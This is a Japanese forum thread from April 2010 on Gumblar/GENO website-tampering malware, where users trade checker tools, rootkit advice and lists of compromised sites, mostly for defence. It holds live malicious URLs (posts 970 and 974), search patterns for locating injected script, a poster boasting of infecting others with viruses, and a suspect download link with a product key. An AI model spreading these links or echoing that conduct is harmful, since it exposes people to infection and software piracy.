↑すまん、送信の途中で文が切れた。

ついでにageとく。


韓国、F5戦闘機墜落←ざまーみろ!801ども!
http://yutori7.2ch.net/test/read.cgi/news4vip/1267606535/


「801ども」の使いどころが間違っとるというか・・・
在日なん?

902 :(VдV) ◆yUyb3Tqn92 :2010/04/18(日) 06:53:05
お前釣り安っ!
俺様を斉藤でも斎藤智成と思うのもお前の勝手だが
困るのは俺様ではなく斎藤智成なのだよ( ´,дゝ`)頭の悪い奴だなァ
なので斎藤晒しならじゃんじゃんやってOK(Vд^)−☆動画も探せばあるから

それよりまた一仕事してきたので晒しましょ〜う(VзV)♪
http://yutori7.2ch.net/test/read.cgi/news4vip/1271529136/n146-168

903 :(VдV) ◆yUyb3Tqn92 :2010/04/18(日) 06:59:37
(VдV)=3ふぅ〜
今日も踏ませてたら時間を忘れちゃったおw夢のような時間だったお
もしかして俺様って日本一ウィルス踏ませてるコテじゃね?ギネス入りも近い?>w<

なんか最近調子が良い
この調子でますます俺様のファンが増えそうだ
ウィルス踏ませてるのはホント、ゲーム感覚だが
考えてみたらあまりブログには書いてないな〜って思った。

近々気が向いたらブログでそういうの書いてみるわ
昔ヤフチャでボイチャしてる奴にウィルス踏ませてふぁびょってる録音とかあるけど
うpしたら需要あるかな?まーお楽しみに>w<

さて、ドラゴンボールとワンピースまで寝るお
(VдV)おやすみお前ら

904 :名無しさん@お腹いっぱい。:2010/04/18(日) 07:12:09
関係ないけど、まだ生きてるチェッカーってあるのかな?

>>2のどれも死んでるんだが…。

905 :名無しさん@お腹いっぱい。:2010/04/18(日) 07:13:00
間違えた。>>5ね。

906 :名無しさん@お腹いっぱい。:2010/04/18(日) 07:20:08
aguseとgredは普通に使えるぞ

907 :名無しさん@お腹いっぱい。:2010/04/18(日) 07:44:43
gredのサイトをチェックするボタンがグレーアウトで使えなかったのが
IE8のInPrivateフィルターがオンのままだったのに最近気がついた俺って

908 :名無しさん@お腹いっぱい。:2010/04/18(日) 08:33:07
最近の亜種だとどういう症状が出るかサッパリ情報が出てないから
感染してるのかどうかわからなくて怖いぜ……
オンラインスキャンは推奨だけで十分なんだよな?

909 :名無しさん@お腹いっぱい。:2010/04/18(日) 12:15:45
www●hd-cre●com

910 :名無しさん@お腹いっぱい。:2010/04/18(日) 12:51:55
>>908
逆に人柱PCを用意してわざと感染すればメインPCが安全かどうかがわかるんじゃね?

911 :名無しさん@お腹いっぱい。:2010/04/18(日) 12:54:18
最近のってなかなか感染しないな
どうやったら感染するんだ?
なんかちゃんと感染してないサイトも多いんじゃないか


912 :名無しさん@お腹いっぱい。:2010/04/18(日) 12:54:57
http:// logsoku.com/thread/pc11.2ch.net/sec/1263822552/l50

↑はログ速の過去ログなんだが
これ踏んだらカスペがヒューリスティックで遮断した
しかしgredで「リンク先のページをチェック」のオプションを使用しないと安全だと言われる(リンク先のページのスキャンを行うと改ざんサイトを検出)し、
しかもこれ他でもないこのスレの過去ログだから誰かが直リンで貼った改ざんサイトのURLに反応してカスペが遮断しただけかね?
それともスレ住人が書いたスクリプトにでも反応したのか
>>2はしてあるしjavascriptも無効でその上仮想ブラウザ使ってるんだがちょっと不安になったもんで・・・

913 :名無しさん@お腹いっぱい。:2010/04/18(日) 12:58:11
>>912
2ちゃんのログかな
なら問題ない

914 :名無しさん@お腹いっぱい。:2010/04/18(日) 14:15:39
>>905
danさんとこも普通に使えてるよ

915 :名無しさん@お腹いっぱい。:2010/04/18(日) 17:35:26
実際のとこ感染するとどんな症状がでるの?
再起動すると立ち上がらなくなったりとか?

916 :名無しさん@お腹いっぱい。:2010/04/18(日) 19:01:53
ルートキット仕込まれたらなんでも出来るから一概には言えないだろうな
ぶっちゃけ何やるかはクラッカーの気分次第なんじゃないかな・・・

917 :名無しさん@お腹いっぱい。:2010/04/18(日) 19:12:00
だからこそクリーンインストールが勧められるわけか

918 :名無しさん@お腹いっぱい。:2010/04/18(日) 19:25:45
ルートキットってそんなに見つけ出すの難しいのか
ルートキットに仕込まれたものも見つけ出せるようなのを開発したら
ノーベル賞取れるくらい難しいの?

919 :名無しさん@お腹いっぱい。:2010/04/18(日) 19:28:41
ノーベル賞にそういう分野の賞はない

920 :名無しさん@お腹いっぱい。:2010/04/18(日) 19:28:44
>>918
見つけ出すのは知識があればそれなりに出来るが、
駆除するのは非常に難しい。
それはセキュリティのプロでもルートキットを発見すると即クリーンインストールするほどだ。

921 :名無しさん@お腹いっぱい。:2010/04/18(日) 19:42:18
>>915
感染させる目的が「利用者を困らせること」じゃなくて
「自分たち(と顧客)がそのPCを自由に使えるようにすること」だから
あからさまな不具合を出すようなことはあんまりない
たまにミスって出ちゃうけどそういうのはすぐ修正される

自由に使って何をしたいかというと、フィッシング詐欺用のサイトを構築したり
スパムメールを送りまくったり、どっかの国の政府関連サイトを攻撃したり
要は犯罪のお手伝いをすることになります
それによってある日突然おまわりさんがおうちに来るかもしれません

922 :名無しさん@お腹いっぱい。:2010/04/18(日) 20:26:46
>>918
BlackLight使え
といっても、ある種のルートキットは、それでも見つからんけどね。

糞ニーの仕込むルートキット発見した人も、
自分でデバッガ作ってそれで見つけたそうだし

923 :U.F.O ◆U.F.OnbYNA :2010/04/18(日) 21:29:17
概出だったらスマソ
ガンブラー
ttp://www●plci●net/egf/?s=shiseldoh

924 :名無しさん@お腹いっぱい。:2010/04/18(日) 21:55:31
http://www.avast.com/virus-monitor
8080さんついに1位になりましたw

925 :コテハン ◆8080adndqg :2010/04/18(日) 23:09:42
>>923
旧型のタイプ違いが混在
www●plci●net/以下の階層は全滅かな?

禿検索で"window;var" "unescape;var"やってみなー
unescape;this型を除外しても凄い数・・・orz

926 :名無しさん@お腹いっぱい。:2010/04/19(月) 10:51:11
改ざん疑惑
60●37●110●200/

927 :名無しさん@お腹いっぱい。:2010/04/19(月) 11:05:43
>>926
特に異常は見受けられんが

928 :名無しさん@お腹いっぱい。:2010/04/19(月) 13:58:13
こっちの改ざん疑惑はどうですか?
wwwwwwwwwww.net/

929 :名無しさん@お腹いっぱい。:2010/04/19(月) 17:47:42
>>547
> cashingalliance
昨日、有効なスクリプトの再改竄を確認、つーほー。
あちらの鯖缶から午前中に停止等の処置済みの連絡、確認すますた。

930 :名無しさん@お腹いっぱい。:2010/04/19(月) 20:08:19
>>2
1 済
2 Foxit Reader使ってるので未導入
3 同上
4 済
5 済
6 済

931 :名無しさん@お腹いっぱい。:2010/04/19(月) 20:10:20
FoxitやPDF-XChangeもJavaScript機能使える環境だから注意

932 :名無しさん@お腹いっぱい。:2010/04/19(月) 20:34:11
んだんだ。
そういうおいらは Linux使いw

933 :名無しさん@お腹いっぱい。:2010/04/19(月) 21:01:44
この機会にpdf滅びてくんないかな

934 :名無しさん@お腹いっぱい。:2010/04/19(月) 21:11:53
ウイルスセキュリティ対策ソフトのウイルスバスター2010(360日無料版)
http://www.techgravy.net/2010/04/free-trend-micro-internet-security-2010.html
http://virusbuster.jp/vb2010/trial2/?cid=paid_aw_1&sem_detection
どちらか必要な方を落として、
Enter this product key pfeo-9996-0691-8113-9527 ( OEM version )
このキーを使用で行ける。

935 :名無しさん@お腹いっぱい。:2010/04/19(月) 21:13:28
>>930
安全第一ならFoxit Readerは避けた方がいい。
安全性よりも軽さの方が大事なら自己責任で使えばいいけど。

936 :名無しさん@お腹いっぱい。:2010/04/19(月) 21:21:25
ごおgぇどきゅめんとびゅーあーでかいけつやで

937 :名無しさん@お腹いっぱい。:2010/04/19(月) 21:33:13
会社や役所でのやりとりがpdfなので最早避けては通れない

938 :名無しさん@お腹いっぱい。:2010/04/19(月) 21:36:23
>>937
インターネットに接続しなければおk

939 :名無しさん@お腹いっぱい。:2010/04/19(月) 21:40:16
>>934
上のアドレスはウイルス注意

940 :名無しさん@お腹いっぱい。:2010/04/19(月) 21:42:33
>>939
変なスクリプトはあるけどウイルスじゃなくね?

941 :名無しさん@お腹いっぱい。:2010/04/19(月) 21:51:46
>>940
ソース見たけど怪しすぎるだろ、そこ。
trendmicroのアンチウイルス落とすのに、そんなサイト行く必要無いだろ

942 :名無しさん@お腹いっぱい。:2010/04/19(月) 22:24:21
そもそもスレの流れと関係なく唐突にURL貼ってるのは警戒していい

943 :939:2010/04/19(月) 23:10:32
>>941-942
ですよね、やっぱり

944 :コテハン ◆8080adndqg :2010/04/19(月) 23:16:45
>>942
それは・・俺が掘ってきた陥落サイトも含むのか?

【陥落サイトのURL悪用厳禁】とか
危ないとこは「←アクセス注意」とか書いてるんだが・・・

945 :名無しさん@お腹いっぱい。:2010/04/19(月) 23:22:20
>>944
スレタイと合ってる分には問題ないだろ
バスターなんてどう考えても関係ない

946 :コテハン ◆8080adndqg :2010/04/19(月) 23:34:46
>>945
では、スレタイ通りの陥落サイトを。
URLがアヤシイのは気のせいだ(たぶん)

【陥落サイトのURL悪用厳禁】
www●god-hand●org ←途中で切れてる
22ch●org/pocketsbs/


947 :コテハン ◆8080adndqg :2010/04/19(月) 23:48:14
連投スマソ

【陥落サイトのURL悪用厳禁】
amyou●net/
↓たぶん全滅↓
ttp://www●google●co●jp/search?hl=ja&source=hp&q=site%3Aamyou●net

70po●com/pocketsbs/
ttp://www●google●co●jp/search?hl=ja&q=site%3A*%2Fpocketsbs%2F
絞り込み方法を模索ちう...

948 :名無しさん@お腹いっぱい。:2010/04/20(火) 00:07:13 ?2BP(1236)
>>946
> god-hand
jsが ぁぅぁぅぁー

949 :名無しさん@お腹いっぱい。:2010/04/20(火) 00:10:53
「写女」っていう着エロ系でそれなりにDVDシリーズ作ってる
メーカーのサイトだが、ウィルス警告が出た。
とりあえず間違いかもしれないので注意喚起のためにスレ探し回ってここに書いてみたが、
どうですかね? 公式サイトなんでググればすぐ出るし。

950 :名無しさん@お腹いっぱい。:2010/04/20(火) 00:12:23
ここは鑑定スレではございません

951 :名無しさん@お腹いっぱい。:2010/04/20(火) 01:02:36
たぶん感染中だな

952 :名無しさん@お腹いっぱい。:2010/04/20(火) 01:44:24
"unescape;var" OR "window;var" OR "document;this" OR "document;var" "false;this" OR "false;var" -javascript -java

下手なワードもOR打ちゃ当たる的な何かorz

953 :名無しさん@お腹いっぱい。:2010/04/20(火) 01:45:31
sage忘れた…

954 :名無しさん@お腹いっぱい。:2010/04/20(火) 18:25:42
>>935
横から失礼。Foxitが純正リーダーに次ぐ危険性だとは思わなんだ。
ところで、代替リーダーどれかオススメしてくれないか?

955 :コテハン ◆8080adndqg :2010/04/20(火) 18:29:41
【陥落サイトのURL悪用厳禁】
kagaden●com/haato ←途中切れ
www●shinsei-fukushi●net
www●0120110908●com/ ←ガル繋がり?
www●hd-cre●com/
↓たぶん全滅↓
ttp://www●google●co●jp/search?hl=ja&q=site%3Ahd-cre●com%2F

誰か新スレ建ててくださいなのです...

956 :名無しさん@お腹いっぱい。:2010/04/20(火) 18:31:38
>>954
Google ドキュメント ビューア
ttp://docs.google.com/viewer

957 :名無しさん@お腹いっぱい。:2010/04/20(火) 19:36:36
>>954
http://pc12.2ch.net/software/

958 :名無しさん@お腹いっぱい。:2010/04/20(火) 20:10:03
>>954
勘違いしてはいけない。逆だ。
ことセキュリティに関しては、今のFoxit ReaderはAdobe Readerより下。

959 :名無しさん@お腹いっぱい。:2010/04/20(火) 20:19:31
すっかり忘れられてるPDF-XChange Viewer・・・

960 :名無しさん@お腹いっぱい。:2010/04/20(火) 22:57:47
>>955
> kagaden
index2.phpとindex3.phpが ぁぅぁぅぁー

961 :名無しさん@お腹いっぱい。:2010/04/21(水) 03:13:17
次スレ逝ってみる。

962 :961:2010/04/21(水) 03:20:21
次スレ

【Gumblar/GENO】Web改竄ウイルス総合スレ8【8080】
http://pc11.2ch.net/test/read.cgi/sec/1271787262/

963 :名無しさん@お腹いっぱい。:2010/04/21(水) 07:28:55
>>962


964 :名無しさん@お腹いっぱい。:2010/04/21(水) 21:31:43
>>962
乙です

965 :738:2010/04/22(木) 01:36:58
>>708
Last-Modified: Wed, 21 Apr 2010 14:36:46 GMT : /content/index.htm
>NPO愛知ネットからのお詫びとお知らせ

(´・ω・`)ショボーン

966 :コテハン ◆8080adndqg :2010/04/22(木) 14:21:32
>>965
理事長:天野竹行>
改竄されていた事を隠蔽せず、告知を行ってください。


【重要】NPO愛知ネットからのお詫びとお知らせ
◆当ホームページを管理しているパソコンがGumblar亜種に感染し、ホームページが改竄されておりました。

◆改竄されていた期間
○月○日○時○分〜●月●日●時●分

◆改竄されていたページ

◆該当期間に当ホームページを閲覧した方へ
セキュリティソフトで(以下略
オンラインスキャンで(以下略

↑こんな感じで。


マトモな対応ができないなら、ホームページを閉鎖してweb上から消滅してください。

967 :名無しさん@お腹いっぱい。:2010/04/22(木) 16:40:11
どうせアホみたいにちっさいリンク貼るだけだろ

968 :名無しさん@お腹いっぱい。:2010/04/22(木) 16:49:59
2ちゃんという危険リンク満載のサイトで
何でそんな偉そうなんだ

969 :名無しさん@お腹いっぱい。:2010/04/22(木) 17:16:33
2ちゃんのリンクは安全さ!
なんてったって人柱リンクチェッカーが山のようにいるからな!

970 :名無しさん@お腹いっぱい。:2010/04/22(木) 17:17:51
http://22ch.org/pocketsbs/
http://amyou.net/
http://70po.com/pocketsbs/
http://www.shinsei-fukushi.net
http://www.0120110908.com/
http://www.hd-cre.com/


971 :名無しさん@お腹いっぱい。:2010/04/22(木) 20:12:50
>>967
おっきいw

972 :名無しさん@お腹いっぱい。:2010/04/24(土) 08:11:29
ここつかわないの?

973 :名無しさん@お腹いっぱい。:2010/04/24(土) 12:41:06
新スレ立てるのが早すぎたんだろうな
流れがあっちに行っちゃってどうしたものやら

【陥落サイトのURL悪用厳禁】
再改竄、放置プレイ、新規サイトのごった煮です
重複してたらスルーしてちょうだい

"unescape;var" "new RegExp" -JAVA -JAVAScript
pre21●jp
www●sakiko●jp
www●shinsei-fukushi●net
www●marbell●jp
www●ecos-kenya●jp

974 :名無しさん@お腹いっぱい。:2010/04/24(土) 13:31:58
tp://yamisyoku.info/

これもかな?
realshoponline.info:8080/worldofwarcraft-com/google.com/lemonde.fr.php

975 :名無しさん@お腹いっぱい。:2010/04/24(土) 15:41:51
KatesKiller PCからも駆除して欲しいもんだよね。
http://support.kaspersky.co.jp/viruses/solutions?qid=208283462

976 :名無しさん@お腹いっぱい。:2010/04/24(土) 15:42:51
>>974
>>1
それでもリンクされるから危ない

977 :名無しさん@お腹いっぱい。:2010/04/24(土) 19:01:23
>>974
テンプレの書き方に従えないならアドレスは一切貼らない方がいい

978 :名無しさん@お腹いっぱい。:2010/04/24(土) 19:06:07
埋めるか

979 :名無しさん@お腹いっぱい。:2010/04/24(土) 19:37:00
このサイトを踏まされたんだけど、ここも開いただけでウイルスに感染しちゃうサイトなのかな
どなたか教えてください
http://ime●nu/amyou●net/?free/n/e/t/download/number=2010

980 :名無しさん@お腹いっぱい。:2010/04/24(土) 19:42:27
埋めますよ

981 :名無しさん@お腹いっぱい。:2010/04/24(土) 19:46:02


982 :名無しさん@お腹いっぱい。:2010/04/24(土) 19:51:44
生め

983 :名無しさん@お腹いっぱい。:2010/04/24(土) 19:53:26


984 :979:2010/04/24(土) 19:53:42
間違った、こっち
http://amyou●net/?free/n/e/t/download/number=2010

985 :名無しさん@お腹いっぱい。:2010/04/24(土) 19:54:55
産め

986 :名無しさん@お腹いっぱい。:2010/04/24(土) 19:57:53
>>984
ちょっとは自分で調べると良いよ
このスレにも報告されてる

987 :名無しさん@お腹いっぱい。:2010/04/24(土) 20:00:11
>>984

>>947

988 :名無しさん@お腹いっぱい。:2010/04/24(土) 20:01:39
さらに埋め

989 :名無しさん@お腹いっぱい。:2010/04/24(土) 20:06:25
うめ

990 :名無しさん@お腹いっぱい。:2010/04/24(土) 20:07:09


991 :名無しさん@お腹いっぱい。:2010/04/24(土) 20:07:52


992 :名無しさん@お腹いっぱい。:2010/04/24(土) 20:08:33
埋めます

993 :名無しさん@お腹いっぱい。:2010/04/24(土) 20:09:50
生め

994 :名無しさん@お腹いっぱい。:2010/04/24(土) 20:11:17
産め

995 :名無しさん@お腹いっぱい。:2010/04/24(土) 20:12:14
再度

次スレ

【Gumblar/GENO】Web改竄ウイルス総合スレ8【8080】
http://pc11.2ch.net/test/read.cgi/sec/1271787262/


996 :名無しさん@お腹いっぱい。:2010/04/24(土) 20:12:56


997 :名無しさん@お腹いっぱい。:2010/04/24(土) 20:14:16
っぱい

998 :名無しさん@お腹いっぱい。:2010/04/24(土) 20:31:30
>>979
専ブラ使えよ

999 :名無しさん@お腹いっぱい。:2010/04/24(土) 20:32:53
1000なら作者は死刑

1000 :名無しさん@お腹いっぱい。:2010/04/24(土) 20:33:41
1000昌夫

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

256 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)